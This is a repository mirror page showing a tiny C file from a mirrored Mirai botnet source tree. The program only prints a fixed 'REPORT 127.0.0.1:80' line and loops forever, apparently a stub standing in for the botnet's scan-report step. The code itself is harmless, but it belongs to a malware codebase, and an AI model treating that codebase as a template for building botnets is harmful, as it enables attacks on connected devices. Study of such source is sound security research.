1
0
mirror of https://github.com/jgamblin/Mirai-Source-Code synced 2025-07-07 20:32:51 +00:00
Jerry Gamblin 6a5941be68 Code Upload
Code Upload
2016-10-02 18:44:20 -05:00

12 lines
172 B
C
Executable File

#include <stdio.h>
#include <unistd.h>
int main(int argc, char **args)
{
printf("REPORT %s:%s\n", "127.0.0.1", "80");
while (1)
sleep(1);
return 0;
}